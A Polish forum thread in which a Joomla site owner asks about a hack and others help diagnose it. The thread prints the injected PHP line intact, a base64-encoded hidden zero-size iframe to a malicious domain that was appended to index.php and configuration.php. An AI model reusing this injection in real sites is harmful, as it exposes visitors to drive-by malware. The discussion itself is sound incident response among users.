Wirus czy co to?

[ostry]

Chyba trafiło mi się włamanie. W jakiś sposób przybyła mi jedna linia w pliku index.php

Kod PHP:

echo base64_decode('PGlmcmFtZSBzcmM9Imh0dHA6Ly9pbi1pbi5pbi9pbi8iIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ImhpZGRlbiIgZnJhbWVib3JkZXI9MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wIHNjcm9sbGluZz1ubz4=');
doGzip();
 ?> 


Podczas przeglądania strony antywirusy alarmują o wykryciu
Win32:socks-ae(wrm)

Żadnych innych zmian nie stwierdziłem.

O dziwo nie jest nic wykrywane podczas przeglądania Firefoxem, a jedynie w Explorerze. Wirusa łapie Avast, ale też nie na wszystkich komputerach.

Używam Joomla! International Edition 1.0.15 stable i mam dołożonego najnowszego JoomFisha i Google Maps a serwis stoi na Home.pl więc raczej bezpiecznym serwerze.

Sprawdziłem kilka innych moich stron i znalazłem identyczny wpis na witrynach postawionych również na serwerze Nazwa.pl więc to nie kwestia serwera. Wpis ten również czasem figurował w pliku configuration.php - zawsze na końcu pliku.
To samo znalazłem również na stronie postawionej na Joomla! 1.5.1 - czysta Joomla bez żadnych dodatków.

Macie jakieś pomysły, którędy to się dostało?

[fampish]

Następną razom (a pewnie będzie) zapisz datę nadpisania pliku i wyślij do admina prośbę aby sprawdził Ci logi, kto i jak dostał się na konto i co zmieniał w tych okolicach. Niech Ci podeśle listę nadpisanych w tamtym momencie plików - może być ich kilka a może być kilkadziesiąt . Ew. sam możesz przeczesywać wszystkie katalogi sprawdzając daty nadpisania plików i tak wyłowić zainfekowane (miłej zabawy - jednego dnia przeczesywałem tak kilka serwisów... niektóre nawet nie wiem jak długo były zainfekowane).
Zdaje się, że jak przeanalizują logi to stwierdzą czy winna jest jakaś dziura w kodzie czy ktoś bezpośrednio zalogował się na ftp (np. mógł 'podsłuchać' hasło). W pierwszym przypadku - szukaj dziury, w drugim - zmieniaj hasła (wszędzie gdzie się da). I nie zapomnij przeszukać ANTYWIREM wszystkich dysków ;)
A tak wogóle to się nie znam i tak tylko sobie gdybam ;) Znalazłem tu kilka rad, ale jakoś nie zawsze skutecznych jak pokazało życie...

[ostry]

Pobawiłem się trochę i przeryłem wszystkie katalogi w poszukiwaniu zmian - po prostu zrobiłem download całej strony i porównałem z czystym backupem.
Zmienione zostały pliki index.php w katalogu głównym, katalogu bieżącej templatki oraz plik configuration.php. We wszystkich dopisany był ten sam kod.

Przeskanowanie pobranej strony antywirusem nic nie pokazało. O logi zmian poprosiłem, ale bez rezultatu - mądry admin odpisał mi tylko, żebym zaktualizował używane oprogramowanie do najnowszej wersji - ciekawe, co miał na myśli, bo Joomla i jej komponenty są na bieżąco z wersją.

Hasła pozmieniałem, a stronę uzbroiłem w .htaccess - w sumie tylko ten rodzaj zabezpieczenia przeoczyłem przy stawianiu serwisu. Zobaczymy, na ile skuteczne jest to działanie. Na razie regularnie zaglądam w pliki i nie widzę ponownych zmian.

[Rybik]

to wstawka:

Kod:

<iframe src="pewna domena z .in" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>

nie klikać!
zablokuj w htaccesie wejście z domen z indii

Kod:

<Limit GET HEAD POST>
order allow,deny
deny from .in
allow from all
</LIMIT>

jeżeli juz tam masz liste <limit to tylko dopisz do niej
deny from .in

[inkos]

Rybiek nie jest to potrzebne - moim zdaniem wystarczy miec tylko czystego ale wlasnego kompa z ktorego korzysta sie nie tylko z Joomla (Pisze o tym fampish). Jeden maly trojan a juz nasze dane dostepowe sa u botow a potem mamy takie oto historyjki.

[ostry]

Komputer mam czysty - skanowałem avastem i spybotem s&d. Jeśli to nie wystarczy, to proszę o sugestie, ale moim zdaniem jest ok. Wpisy .htaccess dodałem - wielkie dzięki za rozkodowanie tego draństwa Rybiku.
Po całej przygodzie pozostaje pytanie - którędy to wlazło? Mam wrażenie, że gdyby chodziło o sniffer i hasło ftp to zniszczenia byłyby dużo większe, ale mogę się mylić.

[Rybik]

1. lista deny ip/domain w htaccess jest jednym z zalecanych środków i nie należy doradzać nikomu ignorowanie takiej aseptyki, od kiedy uaktualniam IPki w moim htaccessie znikło mi wiele dziwnych problemów i nie muszę sie zastanawiać po co jakiś IP łaził mi po dziwnych plikach Joomla co 8 sekund (wcześniej próbował co 2 ale przestawiłem apacza, żeby się nie dał zatykać tak szybko). Co więcej, z mojej listy skorzystał chętnie hostingodawca.
Adresy do blokowania biore z forów typu joomla-security
2. Poszukac prosze w google o wirusie Win32:socks-ae, to worm P2P ale nie chce mis ie wierzyć, że ma związek (ale nie czytałem za wiele)
3. Najbardziej prawdopodobna jest nieszczelność hostingu współdzielonego (np wspólny katalog przechowywania sesji)
4. Powiązany z tematem jest tez Exploit-MS06-014
reszte doczytać